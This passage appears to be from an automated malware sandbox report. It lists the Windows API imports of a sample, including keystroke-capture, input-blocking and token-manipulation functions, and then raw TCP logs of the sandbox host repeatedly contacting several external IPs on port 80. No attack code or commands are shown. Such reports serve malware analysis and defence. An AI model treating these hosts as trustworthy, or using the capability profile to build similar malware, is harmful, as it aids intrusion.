LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Nov 24, 2024 08:10:28.770791054 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:28.770823956 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:30.164858103 CET4981080192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:30.245706081 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:30.245748997 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:30.245879889 CET4981080192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:30.249417067 CET4981080192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:30.284652948 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:30.285429955 CET4981080192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:31.211956024 CET4981780192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:31.331593990 CET804981747.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:31.331707954 CET4981780192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:31.342281103 CET4981780192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:31.461956978 CET804981747.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:32.893115997 CET804981747.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:32.893142939 CET804981747.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:32.893304110 CET4981780192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:32.896217108 CET4981780192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:33.015639067 CET804981747.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:38.859672070 CET4983580192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:38.979362011 CET804983574.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:38.979496002 CET4983580192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:38.993603945 CET4983580192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:39.113444090 CET804983574.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:40.198443890 CET804983574.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:40.198467016 CET804983574.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:40.198487043 CET804983574.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:40.198685884 CET4983580192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:40.508609056 CET4983580192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:41.529026031 CET4984280192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:41.648956060 CET804984274.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:41.651444912 CET4984280192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:41.666551113 CET4984280192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:41.786156893 CET804984274.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:42.916935921 CET804984274.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:42.917006016 CET804984274.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:42.917056084 CET4984280192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:42.918179035 CET804984274.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:42.918226004 CET4984280192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:43.180613995 CET4984280192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:44.199588060 CET4984880192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:44.319196939 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.319303989 CET4984880192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:44.335087061 CET4984880192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:44.454942942 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.455558062 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.456999063 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.457120895 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.458867073 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.458978891 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.458988905 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.458997965 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.459007025 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:45.583853006 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:45.583875895 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:45.583925009 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:45.583944082 CET4984880192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:45.584038019 CET4984880192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:45.836669922 CET4984880192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:46.856529951 CET4985480192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:46.976315022 CET804985474.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:46.976495981 CET4985480192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:46.991288900 CET4985480192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:47.110841990 CET804985474.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:48.200839996 CET804985474.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:48.200902939 CET804985474.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:48.200961113 CET804985474.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:48.201147079 CET4985480192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:48.205373049 CET4985480192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:48.324928999 CET804985474.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:53.698152065 CET4987080192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:10:53.817719936 CET804987013.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:53.821497917 CET4987080192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:10:53.836222887 CET4987080192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:10:53.955837011 CET804987013.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:55.017045021 CET804987013.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:55.017096996 CET4987080192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:10:55.352282047 CET4987080192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:10:55.471836090 CET804987013.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:56.371025085 CET4988080192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:10:56.490688086 CET804988013.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:56.493601084 CET4988080192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:10:56.509388924 CET4988080192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:10:56.629120111 CET804988013.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:57.596596956 CET804988013.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:57.596692085 CET4988080192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:10:58.024215937 CET4988080192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:10:58.143821001 CET804988013.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:59.044358015 CET4988680192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:10:59.164098024 CET804988613.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:59.164230108 CET4988680192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:10:59.182293892 CET4988680192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:10:59.301918983 CET804988613.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:59.301932096 CET804988613.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:59.301984072 CET804988613.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:59.301994085 CET804988613.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:59.302028894 CET804988613.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:59.302126884 CET804988613.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:59.302135944 CET804988613.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:59.302252054 CET804988613.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:10:59.302261114 CET804988613.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:11:00.309288979 CET804988613.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:11:00.312704086 CET4988680192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:11:00.696569920 CET4988680192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:11:00.816118956 CET804988613.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:11:01.717394114 CET4989380192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:11:01.837017059 CET804989313.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:11:01.837116003 CET4989380192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:11:01.849385023 CET4989380192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:11:01.969295979 CET804989313.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:11:03.029344082 CET804989313.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:11:03.029376984 CET804989313.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:11:03.029500961 CET4989380192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:11:03.055620909 CET4989380192.168.2.413.248.169.48
                                                                                      Nov 24, 2024 08:11:03.175182104 CET804989313.248.169.48192.168.2.4
                                                                                      Nov 24, 2024 08:11:09.217335939 CET4990980192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:09.337025881 CET8049909103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:09.337131977 CET4990980192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:09.352554083 CET4990980192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:09.517707109 CET8049909103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:10.868021011 CET4990980192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:10.900155067 CET8049909103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:10.900218010 CET4990980192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:10.900274038 CET8049909103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:10.900317907 CET4990980192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:10.987654924 CET8049909103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:10.987704992 CET4990980192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:11.889409065 CET4991780192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:12.008857965 CET8049917103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:12.011356115 CET4991780192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:12.029685020 CET4991780192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:12.149245024 CET8049917103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:13.540115118 CET4991780192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:13.628062010 CET8049917103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:13.628124952 CET4991780192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:13.628161907 CET8049917103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:13.628215075 CET4991780192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:13.659744978 CET8049917103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:13.659878016 CET4991780192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:14.559976101 CET4992480192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:14.679558992 CET8049924103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:14.679959059 CET4992480192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:14.697859049 CET4992480192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:14.817584991 CET8049924103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:14.817620039 CET8049924103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:14.817668915 CET8049924103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:14.817733049 CET8049924103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:14.817770004 CET8049924103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:14.817780018 CET8049924103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:14.817826033 CET8049924103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:14.817869902 CET8049924103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:14.817889929 CET8049924103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:16.211740017 CET4992480192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:16.331855059 CET8049924103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:16.331964016 CET4992480192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:17.230931997 CET4993180192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:17.350704908 CET8049931103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:17.350797892 CET4993180192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:17.361005068 CET4993180192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:17.480564117 CET8049931103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:18.959041119 CET8049931103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:18.959184885 CET8049931103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:18.959244013 CET4993180192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:18.962555885 CET4993180192.168.2.4103.21.221.87
                                                                                      Nov 24, 2024 08:11:19.082014084 CET8049931103.21.221.87192.168.2.4
                                                                                      Nov 24, 2024 08:11:26.285825014 CET4995280192.168.2.48.210.46.21
                                                                                      Nov 24, 2024 08:11:26.405464888 CET80499528.210.46.21192.168.2.4
                                                                                      Nov 24, 2024 08:11:26.405807972 CET4995280192.168.2.48.210.46.21
                                                                                      Nov 24, 2024 08:11:26.421331882 CET4995280192.168.2.48.210.46.21
                                                                                      Nov 24, 2024 08:11:26.540986061 CET80499528.210.46.21192.168.2.4
                                                                                      Nov 24, 2024 08:11:27.930490017 CET4995280192.168.2.48.210.46.21
                                                                                      Nov 24, 2024 08:11:27.981043100 CET80499528.210.46.21192.168.2.4
                                                                                      Nov 24, 2024 08:11:27.981220961 CET4995280192.168.2.48.210.46.21
                                                                                      Nov 24, 2024 08:11:27.981237888 CET80499528.210.46.21192.168.2.4
                                                                                      Nov 24, 2024 08:11:27.981317043 CET4995280192.168.2.48.210.46.21
                                                                                      Nov 24, 2024 08:11:28.050081015 CET80499528.210.46.21192.168.2.4
                                                                                      Nov 24, 2024 08:11:28.050478935 CET4995280192.168.2.48.210.46.21
                                                                                      Nov 24, 2024 08:11:28.952120066 CET4995880192.168.2.48.210.46.21
                                                                                      Nov 24, 2024 08:11:29.072066069 CET80499588.210.46.21192.168.2.4
                                                                                      Nov 24, 2024 08:11:29.072159052 CET4995880192.168.2.48.210.46.21
                                                                                      Nov 24, 2024 08:11:29.093018055 CET4995880192.168.2.48.210.46.21
                                                                                      Nov 24, 2024 08:11:29.212780952 CET80499588.210.46.21192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.060038090 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:47.179564953 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.179667950 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:47.202282906 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:47.321924925 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.321944952 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322057962 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322093010 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322218895 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322232962 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322279930 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322307110 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322359085 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:48.715939045 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:48.821084976 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:48.822192907 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:48.824199915 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:48.824199915 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:48.835684061 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:48.840004921 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:49.731858969 CET5004680192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:49.851383924 CET8050046172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:49.851469994 CET5004680192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:49.863296032 CET5004680192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:49.982877016 CET8050046172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:51.492211103 CET8050046172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:51.493390083 CET8050046172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:51.493441105 CET5004680192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:51.495502949 CET5004680192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:51.614918947 CET8050046172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:57.125539064 CET5004780192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:57.245028973 CET8050047194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:57.245187044 CET5004780192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:57.261665106 CET5004780192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:57.381109953 CET8050047194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:58.667351961 CET8050047194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:58.667390108 CET8050047194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:58.667402983 CET8050047194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:58.667418003 CET8050047194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:58.667448044 CET5004780192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:58.667512894 CET5004780192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:58.775583029 CET5004780192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:59.794177055 CET5004880192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:59.913624048 CET8050048194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:59.913798094 CET5004880192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:59.929430962 CET5004880192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:00.049213886 CET8050048194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:01.334291935 CET8050048194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:01.334316969 CET8050048194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:01.334328890 CET8050048194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:01.334383965 CET5004880192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:01.334427118 CET8050048194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:01.334496975 CET5004880192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:01.430687904 CET5004880192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:02.449644089 CET5004980192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:02.570218086 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.570502996 CET5004980192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:02.588238955 CET5004980192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:02.707758904 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.707887888 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.707937956 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.708009958 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.708034039 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.708134890 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.708139896 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.708235025 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.708256960 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:03.996877909 CET8050049194.58.112.174192.168.2.4
